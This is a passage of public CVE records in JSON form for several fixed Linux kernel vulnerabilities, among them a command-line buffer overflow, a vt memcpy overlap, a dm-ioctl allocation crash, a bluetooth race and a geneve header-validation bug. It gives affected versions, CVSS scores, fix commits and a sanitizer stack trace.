},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.157",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.88",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.29",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.8",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ninit/main.c: Fix potential static_command_line memory overflow\n\nWe allocate memory of size \u0027xlen + strlen(boot_command_line) + 1\u0027 for\nstatic_command_line, but the strings copied into static_command_line are\nextra_command_line and command_line, rather than extra_command_line and\nboot_command_line.\n\nWhen strlen(command_line) \u003e strlen(boot_command_line), static_command_line\nwill overflow.\n\nThis patch just recovers strlen(command_line) which was miss-consolidated\nwith strlen(boot_command_line) in the commit f5c7310ac73e (\"init/main: add\nchecks for the return value of memblock_alloc*()\")"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:34.459Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/2ef607ea103616aec0289f1b65d103d499fa903a"
},
{
"url": "https://git.kernel.org/stable/c/0dc727a4e05400205358a22c3d01ccad2c8e1fe4"
},
{
"url": "https://git.kernel.org/stable/c/76c2f4d426a5358fced5d5990744d46f10a4ccea"
},
{
"url": "https://git.kernel.org/stable/c/81cf85ae4f2dd5fa3e43021782aa72c4c85558e8"
},
{
"url": "https://git.kernel.org/stable/c/936a02b5a9630c5beb0353c3085cc49d86c57034"
},
{
"url": "https://git.kernel.org/stable/c/46dad3c1e57897ab9228332f03e1c14798d2d3b9"
}
],
"title": "init/main.c: Fix potential static_command_line memory overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26988",
"datePublished": "2024-05-01T05:27:39.190Z",
"dateReserved": "2024-02-19T14:20:24.205Z",
"dateUpdated": "2025-11-04T17:15:27.644Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35823 (GCVE-0-2024-35823)
Vulnerability from cvelistv5
Published
2024-05-17 13:23
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vt: fix unicode buffer corruption when deleting characters
This is the same issue that was fixed for the VGA text buffer in commit
39cdb68c64d8 ("vt: fix memory overlapping when deleting chars in the
buffer"). The cure is also the same i.e. replace memcpy() with memmove()
due to the overlaping buffers.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c Version: 81732c3b2fede049a692e58a7ceabb6d18ffb18c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35823",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T15:14:05.276566Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-07T21:28:05.580Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.458Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fc7dfe3d123f00e720be80b920da287810a1f37d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ff7342090c1e8c5a37015c89822a68b275b46f8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1ce408f75ccf1e25b3fddef75cca878b55f2ac90"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0190d19d7651c08abc187dac3819c61b726e7e3f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/994a1e583c0c206c8ca7d03334a65b79f4d8bc51"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7529cbd8b5f6697b369803fe1533612c039cabda"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2933b1e4757a0a5c689cf48d80b1a2a85f237ff1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1581dafaf0d34bc9c428a794a22110d7046d186d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/vt/vt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fc7dfe3d123f00e720be80b920da287810a1f37d",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "ff7342090c1e8c5a37015c89822a68b275b46f8a",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "1ce408f75ccf1e25b3fddef75cca878b55f2ac90",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "0190d19d7651c08abc187dac3819c61b726e7e3f",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "994a1e583c0c206c8ca7d03334a65b79f4d8bc51",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "7529cbd8b5f6697b369803fe1533612c039cabda",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "2933b1e4757a0a5c689cf48d80b1a2a85f237ff1",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
},
{
"lessThan": "1581dafaf0d34bc9c428a794a22110d7046d186d",
"status": "affected",
"version": "81732c3b2fede049a692e58a7ceabb6d18ffb18c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/vt/vt.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvt: fix unicode buffer corruption when deleting characters\n\nThis is the same issue that was fixed for the VGA text buffer in commit\n39cdb68c64d8 (\"vt: fix memory overlapping when deleting chars in the\nbuffer\"). The cure is also the same i.e. replace memcpy() with memmove()\ndue to the overlaping buffers."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:11.480Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fc7dfe3d123f00e720be80b920da287810a1f37d"
},
{
"url": "https://git.kernel.org/stable/c/ff7342090c1e8c5a37015c89822a68b275b46f8a"
},
{
"url": "https://git.kernel.org/stable/c/1ce408f75ccf1e25b3fddef75cca878b55f2ac90"
},
{
"url": "https://git.kernel.org/stable/c/0190d19d7651c08abc187dac3819c61b726e7e3f"
},
{
"url": "https://git.kernel.org/stable/c/994a1e583c0c206c8ca7d03334a65b79f4d8bc51"
},
{
"url": "https://git.kernel.org/stable/c/7529cbd8b5f6697b369803fe1533612c039cabda"
},
{
"url": "https://git.kernel.org/stable/c/2933b1e4757a0a5c689cf48d80b1a2a85f237ff1"
},
{
"url": "https://git.kernel.org/stable/c/1581dafaf0d34bc9c428a794a22110d7046d186d"
}
],
"title": "vt: fix unicode buffer corruption when deleting characters",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35823",
"datePublished": "2024-05-17T13:23:25.651Z",
"dateReserved": "2024-05-17T12:19:12.346Z",
"dateUpdated": "2025-05-04T09:06:11.480Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-23851 (GCVE-0-2024-23851)
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2025-11-04 18:28
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel->data_size check. This is related to ctl_ioctl.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:28:57.019Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/dm-devel/msg56574.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.spinics.net/lists/dm-devel/msg56694.html"
},
{
"name": "FEDORA-2024-d16d94b00d",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-23851",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-23T16:39:18.247676Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-190",
"description": "CWE-190 Integer Overflow or Wraparound",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-06-04T15:05:03.801Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "copy_params in drivers/md/dm-ioctl.c in the Linux kernel through 6.7.1 can attempt to allocate more than INT_MAX bytes, and crash, because of a missing param_kernel-\u003edata_size check. This is related to ctl_ioctl."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:14:34.299Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.spinics.net/lists/dm-devel/msg56574.html"
},
{
"url": "https://www.spinics.net/lists/dm-devel/msg56694.html"
},
{
"name": "FEDORA-2024-d16d94b00d",
"tags": [
"vendor-advisory"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
},
{
"name": "[debian-lts-announce] 20240625 [SECURITY] [DLA 3842-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"name": "[debian-lts-announce] 20240627 [SECURITY] [DLA 3840-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-23851",
"datePublished": "2024-01-23T00:00:00.000Z",
"dateReserved": "2024-01-23T00:00:00.000Z",
"dateUpdated": "2025-11-04T18:28:57.019Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-24857 (GCVE-0-2024-24857)
Vulnerability from cvelistv5
Published
2024-02-05 07:31
Modified
2025-02-13 17:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-362 - Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Summary
A race condition was found in the Linux kernel's net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux kernel |
Version: v4.0-rc1 < v6.8-rc2 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-24857",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-21T19:29:31.571479Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:43:34.885Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:28:12.866Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8155"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"bluetooth"
],
"packageName": "kernel",
"platforms": [
"Linux",
"x86",
"ARM"
],
"product": "Linux kernel",
"programFiles": [
"https://gitee.com/anolis/cloud-kernel/blob/devel-5.10/net/bluetooth/hci_debugfs.c"
],
"repo": "https://gitee.com/anolis/cloud-kernel.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "v6.8-rc2",
"status": "affected",
"version": "v4.0-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u767d\u5bb6\u9a79 \u003cbaijiaju@buaa.edu.cn\u003e"
},
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "\u97e9\u6842\u680b \u003changuidong@buaa.edu.cn\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eA race condition was found in the Linux kernel\u0027s net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service.\u003c/p\u003e"
}
],
"value": "A race condition was found in the Linux kernel\u0027s net/bluetooth device driver in conn_info_{min,max}_age_set() function. This can result in integrity overflow issue, possibly leading to bluetooth connection abnormality or denial of service."
}
],
"impacts": [
{
"capecId": "CAPEC-26",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-26 Leveraging Race Conditions"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-27T12:09:33.398Z",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8155"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://lore.kernel.org/lkml/20231222162310.6461-1-2045gemini@gmail.com/T/\"\u003ehttps://lore.kernel.org/lkml/20231222162310.6461-1-2045gemini@gmail.com/T/\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "https://lore.kernel.org/lkml/20231222162310.6461-1-2045gemini@gmail.com/T/ https://lore.kernel.org/lkml/20231222162310.6461-1-2045gemini@gmail.com/T/"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Race condition vulnerability in Linux kernel bluetooth in conn_info_{min,max}_age_set()",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2024-24857",
"datePublished": "2024-02-05T07:31:31.308Z",
"dateReserved": "2024-02-01T09:11:56.214Z",
"dateUpdated": "2025-02-13T17:40:33.008Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35973 (GCVE-0-2024-35973)
Vulnerability from cvelistv5
Published
2024-05-20 09:42
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
geneve: fix header validation in geneve[6]_xmit_skb
syzbot is able to trigger an uninit-value in geneve_xmit() [1]
Problem : While most ip tunnel helpers (like ip_tunnel_get_dsfield())
uses skb_protocol(skb, true), pskb_inet_may_pull() is only using
skb->protocol.
If anything else than ETH_P_IPV6 or ETH_P_IP is found in skb->protocol,
pskb_inet_may_pull() does nothing at all.
If a vlan tag was provided by the caller (af_packet in the syzbot case),
the network header might not point to the correct location, and skb
linear part could be smaller than expected.
Add skb_vlan_inet_prepare() to perform a complete mac validation.
Use this in geneve for the moment, I suspect we need to adopt this
more broadly.
v4 - Jakub reported v3 broke l2_tos_ttl_inherit.sh selftest
- Only call __vlan_get_protocol() for vlan types.
v2,v3 - Addressed Sabrina comments on v1 and v2
[1]
BUG: KMSAN: uninit-value in geneve_xmit_skb drivers/net/geneve.c:910 [inline]
BUG: KMSAN: uninit-value in geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030
geneve_xmit_skb drivers/net/geneve.c:910 [inline]
geneve_xmit+0x302d/0x5420 drivers/net/geneve.c:1030
__netdev_start_xmit include/linux/netdevice.h:4903 [inline]
netdev_start_xmit include/linux/netdevice.h:4917 [inline]
xmit_one net/core/dev.c:3531 [inline]
dev_hard_start_xmit+0x247/0xa20 net/core/dev.c:3547
__dev_queue_xmit+0x348d/0x52c0 net/core/dev.c:4335
dev_queue_xmit include/linux/netdevice.h:3091 [inline]
packet_xmit+0x9c/0x6c0 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3081 [inline]
packet_sendmsg+0x8bb0/0x9ef0 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x30f/0x380 net/socket.c:745
__sys_sendto+0x685/0x830 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1d0 net/socket.c:2199
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
Uninit was created at:
slab_post_alloc_hook mm/slub.c:3804 [inline]
slab_alloc_node mm/slub.c:3845 [inline]
kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888
kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577
__alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668
alloc_skb include/linux/skbuff.h:1318 [inline]
alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504
sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795
packet_alloc_skb net/packet/af_packet.c:2930 [inline]
packet_snd net/packet/af_packet.c:3024 [inline]
packet_sendmsg+0x722d/0x9ef0 net/packet/af_packet.c:3113
sock_sendmsg_nosec net/socket.c:730 [inline]
__sock_sendmsg+0x30f/0x380 net/socket.c:745
__sys_sendto+0x685/0x830 net/socket.c:2191
__do_sys_sendto net/socket.c:2203 [inline]
__se_sys_sendto net/socket.c:2199 [inline]
__x64_sys_sendto+0x125/0x1d0 net/socket.c:2199
do_syscall_64+0xd5/0x1f0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
CPU: 0 PID: 5033 Comm: syz-executor346 Not tainted 6.9.0-rc1-syzkaller-00005-g928a87efa423 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 35385daa8db320d2d9664930c28e732578b0d7de Version: 6f92124d74419797fadfbcd5b7a72c384a6413ad Version: 71ad9260c001b217d704cda88ecea251b2d367da Version: d13f048dd40e8577260cd43faea8ec9b77520197 Version: d13f048dd40e8577260cd43faea8ec9b77520197 Version: d13f048dd40e8577260cd43faea8ec9b77520197 Version: d13f048dd40e8577260cd43faea8ec9b77520197 Version: d13f048dd40e8577260cd43faea8ec9b77520197 Version: 9a51e36ebf433adf59c051bec33f5aa54640bb4d Version: 21815f28af8081b258552c111774ff320cf38d38 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35973",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T18:16:33.435108Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
